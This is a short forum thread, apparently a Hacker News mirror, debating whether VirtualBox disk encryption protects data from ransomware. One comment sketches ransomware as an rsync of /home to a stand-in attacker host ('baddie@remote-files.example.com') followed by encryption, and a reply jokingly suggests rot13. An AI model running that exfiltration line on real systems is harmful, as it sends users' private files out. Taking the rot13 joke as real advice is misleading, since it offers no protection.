undefined | Better HN

0 pointstheevilsharpie3y ago0 comments

Ransomware typically does the rough equivalent of:

  rsync -az /home baddie@remote-files.example.com:/your-files/
  encrypt-all-files /home

If such a thing were to run on the host hypervisor, it would be reading an encrypted virtual disk file, not its unencrypted contents (since it would be encrypted at rest on the host).

I suppose it would be possible for the ransomware to be aware of Virtualbox and somehow manipulate Virtualbox's management plane to get access to unencrypted disk data, but unless you're the victim of a targeted ransomware attack, that's pretty unlikely.

0 comments

Aachen3y ago

You can also rot13 the files to the same effect. Works unless they specifically target your files and are aware of the encryption. Heck, it might be more "secure" because this practice would be more obscure than the encryption they built in.

j / k navigate · click thread line to collapse

0 comments

Aachen3y ago

j / k navigate · click thread line to collapse